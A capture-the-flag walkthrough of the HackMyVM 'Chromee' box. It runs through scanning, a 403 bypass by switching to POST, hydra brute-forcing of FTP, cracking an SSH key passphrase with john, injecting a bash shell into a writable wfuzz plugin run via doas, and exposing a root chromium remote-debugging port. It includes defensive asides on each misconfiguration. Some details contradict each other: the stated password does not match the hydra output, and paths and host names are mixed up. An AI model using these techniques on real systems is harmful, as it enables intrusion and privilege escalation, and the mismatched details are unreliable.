HackMyVM-Chromee-Walkthrough
城南花已开

Information Gathering

Service Discovery

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e3:f6:57 VMware, Inc.
192.168.60.234 08:00:27:a5:6f:25 PCS Systemtechnik GmbH
192.168.60.254 00:50:56:f5:54:75 VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.093 seconds (122.31 hosts/sec). 4 responded
export ip=192.168.60.234
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
To scan or not to scan? That is the question.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.234:22
Open 192.168.60.234:80
Open 192.168.60.234:8080
Open 192.168.60.234:23333
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-08 10:57 CST
Initiating ARP Ping Scan at 10:57
Scanning 192.168.60.234 [1 port]
Completed ARP Ping Scan at 10:57, 0.09s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 10:57
Scanning primary.hmv (192.168.60.234) [4 ports]
Discovered open port 8080/tcp on 192.168.60.234
Discovered open port 80/tcp on 192.168.60.234
Discovered open port 23333/tcp on 192.168.60.234
Discovered open port 22/tcp on 192.168.60.234
Completed SYN Stealth Scan at 10:57, 0.05s elapsed (4 total ports)
Nmap scan report for primary.hmv (192.168.60.234)
Host is up, received arp-response (0.00050s latency).
Scanned at 2025-03-08 10:57:15 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
8080/tcp open http-proxy syn-ack ttl 64
23333/tcp open elxmgmt syn-ack ttl 64
MAC Address: 08:00:27:A5:6F:25 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds
Raw packets sent: 5 (204B) | Rcvd: 5 (204B)

Directory Enumeration

/secret.php is found.

❯ gobuster dir -u  "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,zip,txt -b 404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.234
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 4464]
/post.php (Status: 200) [Size: 3]
/secret.php (Status: 200) [Size: 549]
Progress: 99471 / 1102800 (9.02%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 99980 / 1102800 (9.07%)
===============================================================
Finished
===============================================================

Source Code Disclosure

Fetching the page with curl shows that the PHP in it is not executed; it is returned to us as plain text.

In the source there is a parameter named aaa; when it is set, the page outputs the file /opt/note/dic.txt.

The problem is that, requested this way, the PHP is never interpreted for us.

❯ curl $ip/secret.php
<!DOCTYPE html>
<html>
<head>
<title>Secret</title>
</head>
<body>
<?php
$greeting = date('H') < 12 ? '早上好' : (date('H') < 18 ? '下午好' : '晚上好');
$visitorIP = htmlspecialchars($_SERVER['REMOTE_ADDR']);

echo "<h1>{$greeting},adriana</h1>";
echo "<p>当前时间:" . date('Y-m-d H:i:s') . "</p>";
echo "<p>你的IP:{$visitorIP}</p>";
if (isset($_GET['aaa'])) {
$file_content = file_get_contents('/opt/note/dic.txt');
echo $file_content;
} else {
die();
}
?>
</body>
</html>

Bypass403

Changing direction: port 8080 is open as well.

Let's scan it.

❯ gobuster dir -u  "http://$ip:8080" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,zip,txt -b 404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.234:8080
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,php,html,zip
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 281]
/index.html (Status: 200) [Size: 33]
/javascript (Status: 301) [Size: 328] [--> http://192.168.60.234:8080/javascript/]
/silence (Status: 403) [Size: 281]
/.html (Status: 403) [Size: 281]
/server-status (Status: 403) [Size: 281]
Progress: 1102795 / 1102800 (100.00%)
===============================================================
Finished
===============================================================

This finds /silence, but it answers 403 Forbidden and turns us away.

❯ curl $ip:8080/under_construction
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access this resource.</p>
<hr>
<address>Apache/2.4.56 (Debian) Server at 192.168.60.234 Port 8080</address>
</body></html>

Try running the bypass-403 script against it.

❯ bypass-403.sh $ip:8080/silence/
____ _ _ ___ _____
| __ ) _ _ _ __ __ _ ___ ___ | || | / _ \___ /
| _ \| | | | '_ \ / _` / __/ __|_____| || |_| | | ||_ \
| |_) | |_| | |_) | (_| \__ \__ \_____|__ _| |_| |__) |
|____/ \__, | .__/ \__,_|___/___/ |_| \___/____/
|___/|_|
By Iam_J0ker
./bypass-403.sh https://example.com path

403,281 --> 192.168.60.234:8080/under_construction/
403,281 --> 192.168.60.234:8080/under_construction/%2e/
403,281 --> 192.168.60.234:8080/under_construction//.
403,281 --> 192.168.60.234:8080/under_construction////
403,281 --> 192.168.60.234:8080/under_construction/.//./
403,281 --> 192.168.60.234:8080/under_construction/ -H X-Original-URL:
403,281 --> 192.168.60.234:8080/under_construction/ -H X-Custom-IP-Authorization: 127.0.0.1
403,281 --> 192.168.60.234:8080/under_construction/ -H X-Forwarded-For: http://127.0.0.1
403,281 --> 192.168.60.234:8080/under_construction/ -H X-Forwarded-For: 127.0.0.1:80
403,281 --> 192.168.60.234:8080/under_construction -H X-rewrite-url:
403,281 --> 192.168.60.234:8080/under_construction/%20
403,281 --> 192.168.60.234:8080/under_construction/%09
403,281 --> 192.168.60.234:8080/under_construction/?
403,281 --> 192.168.60.234:8080/under_construction/.html
403,281 --> 192.168.60.234:8080/under_construction//?anything
403,281 --> 192.168.60.234:8080/under_construction/#
200,638 --> 192.168.60.234:8080/under_construction/ -H Content-Length:0 -X POST
403,281 --> 192.168.60.234:8080/under_construction//*
403,281 --> 192.168.60.234:8080/under_construction/.php
403,281 --> 192.168.60.234:8080/under_construction/.json
405,304 --> 192.168.60.234:8080/under_construction/ -X TRACE
403,281 --> 192.168.60.234:8080/under_construction/ -H X-Host: 127.0.0.1
403,281 --> 192.168.60.234:8080/under_construction/..;/
000,0 --> 192.168.60.234:8080/under_construction/;/
405,304 --> 192.168.60.234:8080/under_construction/ -X TRACE
403,281 --> 192.168.60.234:8080/under_construction/ -H X-Forwarded-Host: 127.0.0.1

Requesting the path with the POST method returns a normal 200.
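
A 403 that disappears when only the HTTP method changes usually means the access control was scoped to a method. In Apache, a directive placed inside `<Limit GET>` applies to GET (and implicitly HEAD) only, so POST, PUT, OPTIONS and the rest fall through to the default allow. The page does not show this server's configuration; the fragment below is an added illustration of that weak pattern next to the corrected one, not the box's actual config, and the directory path is assumed.

```apache
# WEAK: "Require all denied" is wrapped in <Limit GET>, so it only blocks GET/HEAD.
# Any other method (POST with Content-Length: 0, for example) is still served.
<Directory "/var/www/html/under_construction">
    <Limit GET>
        Require all denied
    </Limit>
</Directory>

# CORRECTED: the denial stands on its own and applies to every method.
<Directory "/var/www/html/under_construction">
    Require all denied
</Directory>
```

When a resource genuinely must accept a subset of methods, express the restriction with `<LimitExcept>` (everything not listed is restricted) rather than `<Limit>`, and confirm the intended behaviour with a request for each method rather than for GET alone.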

The page source reveals the domain primary.hmv.

❯ curl $ip:8080/under_construction/ -H Content-Length:0 -X POST
<!DOCTYPE html>
<html>
<head>
<title>Under Construction</title>
<style>
body {
font-family: Arial, sans-serif;
text-align: center;
margin: 0;
padding: 0;
}

.container {
display: flex;
justify-content: center;
align-items: center;
height: 100vh;
}

h1 {
font-size: 30px;
}

p {
font-size: 18px;
color: #888;
}
</style>
</head>
<body>
<div class="container">
<div>
<h1>Under Construction</h1>
<p>We are working to improve our website.</p>
<p>contact: [email protected]</p>
</div>
</div>
</body>
</html>

Edit the hosts file and add the domain.

echo "$ip chromee.hmv"|sudo tee -a /etc/hosts
[sudo] password for Pepster:
192.168.60.234 chromee.hmv

FTP Brute Force

Now go back to port 80 and request secret.php through the domain name.

This gives us a new username, adriana.

image

And from the source obtained earlier we know that passing the parameter aaa returns the contents of dic.txt.

It is a hint, apparently a short story.

❯ curl http://primary.hmv/secret.php\?aaa
<!DOCTYPE html>
<html>
<head>
<title>Secret</title>
</head>
<body>
<h1>早上好,adriana</h1><p>当前时间:2025-03-08 05:06:50</p><p>你的IP :192.168.60.100</p>The Lost Key

Lily, a curious girl, found an old rusty key in the woods. Wondering where it belonged, she asked everyone in the village, but no one knew. One day, she discovered a locked stone well. To her surprise, the key fit. She opened it and descended into a hidden passage. There, she found an ancient chest filled with treasures. But the real treasure was a note inside: “The greatest treasure is the journey, not the prize.” Lily smiled, realizing the adventure was the real reward.
莉莉,一个好奇的女孩,在树林里发现了一把古老生锈的钥匙。想知道它属于哪里,她问村子里的每个人,但没有人知道。有一天,她发现了一个上锁的石井。令她惊讶的是,这把钥匙合适。她打开了它并下到一个隐藏通道中。在那里,她找到了一个装满珍宝的古老箱子。但真正的宝藏是箱子内部的一张纸条:“最大的财富是旅程本身,并非奖品。”莉莉微笑着意识到冒险才是真正的回报。
</body>
</html>

We also noticed that port 23333 runs vsftpd.

So we save the text and use CUPP to build a wordlist from it, then brute-force the FTP service on port 23333.

❯ vi dic.txt
❯ python cupp.py -w dic.txt
___________
cupp.py! # Common
\ # User
\ ,__, # Passwords
\ (oo)____ # Profiler
(__) )\
||--|| * [ Muris Kurgas | [email protected] ]
[ Mebus | https://github.com/Mebus/]


*************************************************
* WARNING!!! *
* Using large wordlists in some *
* options bellow is NOT recommended! *
*************************************************

> Do you want to concatenate all words from wordlist? Y/[N]:
> Do you want to add special chars at the end of words? Y/[N]:
> Do you want to add some random numbers at the end of words? Y/[N]:
> Leet mode? (i.e. leet = 1337) Y/[N]:

[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to dic.txt.cupp.txt, counting 1545 words.
> Hyperspeed Print? (Y/n) :
[+] Now load your pistolero with dic.txt.cupp.txt and shoot! Good luck!

Brute-force it with hydra.

This yields new credentials: adriana:Lily2020

❯ hydra -l adriana -P dic.txt.cupp.txt ftp://$ip:23333 -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-08 12:09:19
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1545 login tries (l:1/p:1545), ~97 tries per task
[DATA] attacking ftp://192.168.60.234:23333/
[STATUS] 720.00 tries/min, 720 tries in 00:01h, 825 to do in 00:02h, 16 active
[23333][ftp] host: 192.168.60.234 login: adriana password: into2006
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-03-08 12:10:22

Connect, and a hidden file named ... is found in the directory.

❯ ftp adriana@$ip -p 23333
Connected to 192.168.60.234.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
229 Entering Extended Passive Mode (|||24481|)
150 Here comes the directory listing.
drwxr-xr-x 2 106 115 4096 Mar 09 08:13 .
drwxr-xr-x 4 0 0 4096 Mar 09 08:12 ..
-rw-r--r-- 1 0 0 3414 Mar 09 08:13 ...
-rw-r--r-- 1 0 0 495 Mar 07 14:40 dic.txt
226 Directory send OK.
ftp> get ...
local: ... remote: ...
229 Entering Extended Passive Mode (|||18588|)
150 Opening BINARY mode data connection for ... (3414 bytes).
100% |*****************************| 3414 1.57 MiB/s 00:00 ETA
226 Transfer complete.
3414 bytes received in 00:00 (643.00 KiB/s)

We can also see that there are two users: follower and softly.

ftp> cd /home
250 Directory successfully changed.
ftp> ls -al
229 Entering Extended Passive Mode (|||50875|)
150 Here comes the directory listing.
drwxr-xr-x 4 0 0 4096 Mar 07 02:55 .
drwxr-xr-x 18 0 0 4096 Mar 07 10:41 ..
drwxr-x--- 4 1000 1000 4096 Mar 09 07:59 follower
drwxr-x--- 3 1001 1001 4096 Mar 07 12:39 softly
226 Directory send OK.
ftp> exit
221 Goodbye.

Check whether the private key's comment carries a username for login; it turns out the key is passphrase-protected.

Crack it with john; the passphrase is cassandra.

chmod 600 id_rsa
❯ ssh-keygen -c -f id_rsa
Enter passphrase:

❯ ssh2john id_rsa >hash
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 24 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
cassandra (id_rsa)
1g 0:00:00:35 DONE (2025-03-08 13:16) 0.02827g/s 28.95p/s 28.95c/s 28.95C/s andre..bethany
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

The key's comment field turns out to be empty.

❯ ssh-keygen -c -f id_rsa
Enter passphrase:
Old comment:
New comment:

Try connecting with each of the two usernames.

User Privilege Escalation

SSH in and find a new hint.

❯ ssh follower@$ip -i id_rsa
Enter passphrase for key 'id_rsa':
follower@pepster:~$ id
uid=1000(follower) gid=1000(follower) grupos=1000(follower)
follower@pepster:~$ cat note.txt
Think about rotations and the cat’s secrets.


47 is not just a number, it's a twist of fate.

follower@pepster:~$ cat /etc/passwd| grep /bin/bash
root:x:0:0:root:/root:/bin/bash
follower:x:1000:1000::/home/follower:/bin/bash
softly:x:1001:1001::/home/softly:/bin/bash

More Enumeration

The home directory contains an image, cat.gif.

╔══════════╣ Searching root files in home dirs (limit 30)
/home/
/home/follower/cat.gif
/root/
/var/www/html/post.php

GIF Timeline Steganography

It is a GIF that does not animate.

image

Looking at the image metadata, the Comment field reads Imagemagick Convert Timeline.

❯ exiftool cat.gif
ExifTool Version Number : 13.10
File Name : cat.gif
Directory : .
File Size : 3.5 MB
File Modification Date/Time : 2025:03:09 14:53:46+08:00
File Access Date/Time : 2025:03:09 14:54:36+08:00
File Inode Change Date/Time : 2025:03:09 14:53:46+08:00
File Permissions : -rw-r--r--
File Type : GIF
File Type Extension : gif
MIME Type : image/gif
GIF Version : 89a
Image Width : 640
Image Height : 640
Has Color Map : Yes
Color Resolution Depth : 8
Bits Per Pixel : 8
Background Color : 0
Animation Iterations : Infinite
Comment : Imagemagick Convert Timeline
Profile CMM Type :
Profile Version : 4.3.0
Profile Class : Display Device Profile
Color Space Data : RGB
Profile Connection Space : XYZ
Profile Date Time : 2016:01:01 00:00:00
Profile File Signature : acsp
Primary Platform : Unknown ()
CMM Flags : Not Embedded, Independent
Device Manufacturer :
Device Model :
Device Attributes : Reflective, Glossy, Positive, Color
Rendering Intent : Media-Relative Colorimetric
Connection Space Illuminant : 0.9642 1 0.82491
Profile Creator :
Profile ID : 0
Profile Description : sRGB
Red Matrix Column : 0.43607 0.22249 0.01392
Green Matrix Column : 0.38515 0.71687 0.09708
Blue Matrix Column : 0.14307 0.06061 0.7141
Media White Point : 0.9642 1 0.82491
Red Tone Reproduction Curve : (Binary data 40 bytes, use -b option to extract)
Green Tone Reproduction Curve : (Binary data 40 bytes, use -b option to extract)
Blue Tone Reproduction Curve : (Binary data 40 bytes, use -b option to extract)
Profile Copyright : Google Inc. 2016
Frame Count : 13
Duration : 6.31 s
Image Size : 640x640
Megapixels : 0.410

From CTF Wiki we learn that a GIF can hide data in its frame timeline.

GIF - CTF Wiki

image

Trying it out: the first 7 frame delays are all different.

❯ identify -format "%s %T \n" cat.gif>cat.txt
cat cat.txt
0 65
1 98
2 65
3 100
4 102
5 98
6 67
7 6
8 6
9 6
10 6
11 6
12 6

These are probably ASCII codes.

A bit of text processing:

cat cat.txt|awk 'NR <=7 {print $2}'|xargs
65 98 65 100 102 98 67

Decode it with CyberChef; since the note also says 47 is a special number, ROT47 is the guess.

This gives the password p3p573r.

image
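As an added example (not part of the original writeup), the script below performs the whole decode offline in Python: it builds a small GIF89a whose thirteen Graphic Control Extension blocks carry the delays listed above (a constructed stand-in for cat.gif, since the real file is not on the page), parses the per-frame delays back out of the file the way `identify -format "%T"` reports them (centiseconds), takes the leading run of printable-ASCII delays, and applies ROT47 for the "47" hint.

```python
import struct

# Frame delays in 1/100 s, exactly as identify printed them for cat.gif.
DELAYS = [65, 98, 65, 100, 102, 98, 67, 6, 6, 6, 6, 6, 6]


def build_gif(delays):
    """Constructed 1x1 GIF89a with one frame per delay; a stand-in for cat.gif."""
    out = bytearray(b"GIF89a")
    # Logical Screen Descriptor: width 1, height 1, no global colour table.
    out += struct.pack("<HHBBB", 1, 1, 0x00, 0, 0)
    for d in delays:
        # Graphic Control Extension: introducer, label, size 4, packed, delay, transparent index, terminator.
        out += b"\x21\xF9\x04\x00" + struct.pack("<H", d) + b"\x00\x00"
        # Image Descriptor: left, top, width, height, packed (no local colour table).
        out += b"\x2C" + struct.pack("<HHHHB", 0, 0, 1, 1, 0x00)
        # LZW minimum code size 2, one 2-byte data sub-block (clear, pixel 0, end), block terminator.
        out += b"\x02\x02\x44\x01\x00"
    out += b"\x3B"  # trailer
    return bytes(out)


def _skip_sub_blocks(data, pos):
    """Advance past a chain of length-prefixed sub-blocks terminated by a 0x00 byte."""
    while True:
        n = data[pos]
        pos += 1
        if n == 0:
            return pos
        pos += n


def gif_frame_delays(data):
    """Return the GCE delay (centiseconds) attached to every image in the GIF, in order."""
    if data[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("not a GIF file")
    packed = data[10]          # Logical Screen Descriptor packed byte
    pos = 13
    if packed & 0x80:          # global colour table present
        pos += 3 * (2 << (packed & 0x07))
    delays, pending = [], 0
    while pos < len(data):
        block = data[pos]
        pos += 1
        if block == 0x3B:      # trailer
            break
        if block == 0x21:      # extension block
            label = data[pos]
            pos += 1
            if label == 0xF9:  # Graphic Control Extension: delay is bytes 2-3 of its 4-byte payload
                pending = struct.unpack_from("<H", data, pos + 2)[0]
            pos = _skip_sub_blocks(data, pos)
        elif block == 0x2C:    # image descriptor
            ipacked = data[pos + 8]
            pos += 9
            if ipacked & 0x80:  # local colour table
                pos += 3 * (2 << (ipacked & 0x07))
            pos += 1            # LZW minimum code size
            pos = _skip_sub_blocks(data, pos)
            delays.append(pending)
            pending = 0         # a GCE applies only to the image that follows it
        else:
            raise ValueError(f"unexpected block 0x{block:02x} at offset {pos - 1}")
    return delays


def rot47(text):
    """ROT47 over the printable ASCII range 0x21-0x7E; the transform is its own inverse."""
    return "".join(
        chr(33 + (ord(c) - 33 + 47) % 94) if 33 <= ord(c) <= 126 else c for c in text
    )


def decode_timeline(delays):
    """Leading run of printable-ASCII delays -> hidden text, then its ROT47."""
    chars = []
    for d in delays:
        if not 33 <= d <= 126:
            break
        chars.append(chr(d))
    hidden = "".join(chars)
    return hidden, rot47(hidden)


if __name__ == "__main__":
    gif = build_gif(DELAYS)
    hidden, password = decode_timeline(gif_frame_delays(gif))
    print(hidden, "->", password)  # AbAdfbC -> p3p573r
```

Because `gif_frame_delays` walks the real block structure (global and local colour tables included), it can be pointed at the actual cat.gif by reading the file into `data`; the trailing frames whose delay is 6 stop the ASCII run, which is why only the first seven frames contribute.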

It turns out to be the follower user's own password, but there is no sudo either.

follower@pepster:~$ su follower
Contraseña:
follower@pepster:~$
follower@pepster:~$ sudo -l
-bash: sudo: orden no encontrada

Privilege Escalation via Wfuzz

Looking closely at the linpeas.sh results, doas is present on the box.

However, the default doas configuration file does not exist.

follower@pepster:~$ which doas
/usr/local/bin/doas
follower@pepster:~$ cat /etc/doas.conf
cat: /etc/doas.conf: No existe el fichero o el directorio

The configuration file path was probably changed.

Use find to locate every file named *.conf.

The doas configuration is hidden at /srv/zeus.conf.

follower@pepster:~$ find / -name *.conf 2>/dev/null |grep -Pv "proc|sys|usr|etc"
/run/tmpfiles.d/static-nodes.conf
/srv/zeus.conf
follower@pepster:~$ cat /srv/zeus.conf
permit follower as softly cmd /usr/local/bin/wfuzz
permit nopass :softly as root cmd /usr/bin/chromium

The man page generated at build time also reveals the doas configuration path.

follower@Chromee:~$ man doas

EXIT STATUS
The doas utility exits 0 on success, and >0 if an error occurs. It may fail for one of the following reasons:

• The config file /srv/zeus.conf could not be parsed.
• The user attempted to run a command which is not permitted.
• The password was incorrect.
• The specified command was not found or is not executable.

User follower is permitted to run /usr/local/bin/wfuzz as softly.
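
Both rules above are worth reading with a defender's eye: the first lets follower run an interpreted tool as another user with any arguments, and the second grants a whole group a root command with no password. The script below is an added example (not code from the writeup or from the doas project) that parses doas.conf rules and reports what each permit rule really grants. The grammar it accepts is the documented `permit|deny [options] identity [as target] [cmd command [args ...]]` form without `setenv { }` blocks; the sample config is the two rules copied from /srv/zeus.conf above.

```python
import os
import stat

# Rule options defined by doas.conf(5); setenv { ... } is not handled here (assumption: unused).
OPTIONS = {"nopass", "nolog", "persist", "keepenv"}

# Constructed input: the two rules shown above from /srv/zeus.conf.
SAMPLE_CONF = """\
# doas rules as found on the box
permit follower as softly cmd /usr/local/bin/wfuzz
permit nopass :softly as root cmd /usr/bin/chromium
"""


def _take(tok, lineno, what):
    if not tok:
        raise ValueError(f"line {lineno}: missing {what}")
    return tok.pop(0)


def parse_doas_conf(text):
    """Parse doas rules into dicts; raises ValueError on malformed lines."""
    rules = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()          # drop comments and blank lines
        if not line:
            continue
        tok = line.split()
        action = tok.pop(0)
        if action not in ("permit", "deny"):
            raise ValueError(f"line {lineno}: expected permit/deny, got {action!r}")
        options = []
        while tok and tok[0] in OPTIONS:
            options.append(tok.pop(0))
        identity = _take(tok, lineno, "identity")      # user, or :group
        target = None
        if tok and tok[0] == "as":
            tok.pop(0)
            target = _take(tok, lineno, "target user")
        command, args = None, None
        if tok and tok[0] == "cmd":
            tok.pop(0)
            command = _take(tok, lineno, "command")
            if tok and tok[0] == "args":
                args = tok[1:]                         # "args" alone means no arguments allowed
                tok = []
        if tok:
            raise ValueError(f"line {lineno}: unexpected tokens {tok}")
        rules.append({"line": lineno, "action": action, "options": options,
                      "identity": identity, "target": target,
                      "command": command, "args": args})
    return rules


def check_command_file(lineno, command):
    """If the command exists on this host, report group/world write permission on it."""
    if not command:
        return []
    try:
        st = os.stat(command)
    except OSError:
        return []                                      # not present here; nothing to check
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        return [f"line {lineno}: {command} is writable by others ({stat.filemode(st.st_mode)})"]
    return []


def audit_rules(rules):
    """Explain what each permit rule actually grants, flagging the broad ones."""
    findings = []
    for r in rules:
        if r["action"] != "permit":
            continue
        who, ln = r["identity"], r["line"]
        target = r["target"] or "any user"            # doas default when 'as' is omitted
        what = r["command"] or "any command"
        if r["command"] is None:
            findings.append(f"line {ln}: {who} may run any command as {target}")
        elif r["args"] is None:
            findings.append(f"line {ln}: {who} may pass arbitrary arguments to {what} as {target}")
        if "nopass" in r["options"]:
            findings.append(f"line {ln}: {who} runs {what} as {target} without a password")
        if "keepenv" in r["options"]:
            findings.append(f"line {ln}: {who} keeps its environment when running {what}")
        if who.startswith(":"):
            findings.append(f"line {ln}: rule applies to every member of group {who[1:]}")
        findings.extend(check_command_file(ln, r["command"]))
    return findings


if __name__ == "__main__":
    for finding in audit_rules(parse_doas_conf(SAMPLE_CONF)):
        print("-", finding)
```

The file check only covers the command binary itself. The weakness exploited on this box sat one level deeper, in a module that wfuzz imports from a user-writable path, which no config-level audit can see; pair this with a `find / -writable` pass over the interpreter's library directories, as the writeup does next.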

We also find a wfuzz module that we have write access to.

follower@pepster:~$ find / -writable 2>/dev/null|grep -Pv "proc|sys|dev|var|run|tmp|home"
/etc/alternatives/php-fpm.sock
/usr/local/lib/python3.9/dist-packages/wfuzz/plugins/payloads/file.py

Exploit it by editing the Python file.

This escalates us to the softly user.

follower@pepster:~$ vi /usr/local/lib/python3.9/dist-packages/wfuzz/plugins/payloads/file.py
import pty
pty.spawn("/bin/bash")
follower@pepster:~$ doas -u softly /usr/local/bin/wfuzz -z file
Password:
/usr/local/lib/python3.9/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
/usr/local/lib/python3.9/dist-packages/wfuzz/wfuzz.py:77: UserWarning:Fatal exception: Bad usage: You must specify an URL.
follower@pepster:~$ doas -u softly /usr/local/bin/wfuzz -z file -u 127.0.0.1
Password:
/usr/local/lib/python3.9/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
softly@pepster:/home/follower$

Grab the flag first.

Root Privilege Escalation

According to the doas configuration, softly can run /usr/bin/chromium as root⁉️

softly@pepster:/home/follower$ cd ~
softly@pepster:~$ cat user.txt
flag{c5dbe81aac6438c522d2f79cc7255e6a}

What is the point of launching a browser?

I upload pspy to monitor system processes.

root runs /root/script.sh once a minute.

2025/03/08 06:58:01 CMD: UID=0     PID=18689  | /usr/sbin/CRON -f
2025/03/08 06:58:01 CMD: UID=0 PID=18690 | /usr/sbin/CRON -f
2025/03/08 06:58:01 CMD: UID=0 PID=18691 | /bin/sh -c /root/script.sh
2025/03/08 06:58:01 CMD: UID=0 PID=18692 | /bin/bash /root/script.sh

Chrome Remote Debugger

More Enumeration

There is a debug.kdbx in /media.

softly@pepster:/tmp$ find / -readable -type f 2>/dev/null|grep -Pv "proc|sys|boot|usr|run|etc|var"
/home/softly/.profile
/home/softly/.bash_logout
/home/softly/user.txt
/home/softly/.config/wfuzz/wfuzz.ini
/home/softly/.bashrc
/tmp/pspy64
/tmp/linpeas.sh
/srv/zeus.conf
/opt/note/.../secret.zip
/opt/note/dic.txt
/media/debug.kdbx

Copy the file to /tmp.

softly@pepster:/tmp$ cd /media/
softly@pepster:/media$ cp debug.kdbx /tmp/
softly@pepster:/media$ chmod 777 debug.kdbx

scp it back to the local machine.

file shows it is actually a PDF document.

❯ scp -i id_rsa follower@$ip:/tmp/debug.kdbx .
Enter passphrase for key 'id_rsa':
debug.kdbx 100% 14KB 2.1MB/s 00:00
❯ file debug.kdbx
debug.kdbx: PDF document, version 1.7
mv debug.kdbx debug.pdf

image

It gives a hint, Chrome DevTools, with port 9222 in bold.

So I simply asked GPT for a command.

Be careful not to mistype it: a chromium started as root cannot be killed afterwards.

softly@pepster:~$ doas /usr/bin/chromium --headless --remote-debugging-port=9222 --no-sandbox http://127.0.0.1 &
  • --headless
    • Runs Chromium in headless mode, i.e. without a graphical user interface; typically used for automation and testing.
  • --remote-debugging-port=9222
    • Sets the remote debugging port to 9222, so Chromium can be debugged remotely through that port.
  • --no-sandbox
    • Disables Chromium's sandbox. The sandbox is a security mechanism that isolates processes; disabling it reduces security but may be necessary in some situations, such as running headless.
  • http://127.0.0.1
    • The URL to open at startup.

Check which local ports are listening and forward the debug port with socat.

softly@pepster:~$ ss -luntp
Netid State Recv-Q Send-Q Local Address:Port Peer Address:PortProcess
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 10 127.0.0.1:9222 0.0.0.0:*
tcp LISTEN 0 511 0.0.0.0:80 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 32 *:23333 *:*
tcp LISTEN 0 511 [::]:80 [::]:*
tcp LISTEN 0 511 *:8080 *:*
tcp LISTEN 0 128 [::]:22 [::]:*
softly@pepster:/tmp$ chmod +x socat
softly@pepster:/tmp$ ./socat TCP-LISTEN:1234,fork TCP4:127.0.0.1:9222 &

Open chrome://inspect/ in the Chrome browser.

image

Once connected, two extra pages appear.

Open the first one.

image

Meanwhile, watch the processes with pspy.

2025/03/08 07:21:01 CMD: UID=0     PID=19624  | /usr/sbin/CRON -f
2025/03/08 07:21:01 CMD: UID=0 PID=19625 | /usr/sbin/CRON -f
2025/03/08 07:21:01 CMD: UID=0 PID=19626 | /bin/sh -c /root/script.sh
2025/03/08 07:21:01 CMD: UID=0 PID=19627 | /bin/bash /root/script.sh

As soon as the script runs, it requests the 127.0.0.1/post.php page,

sending a key along with it.

image

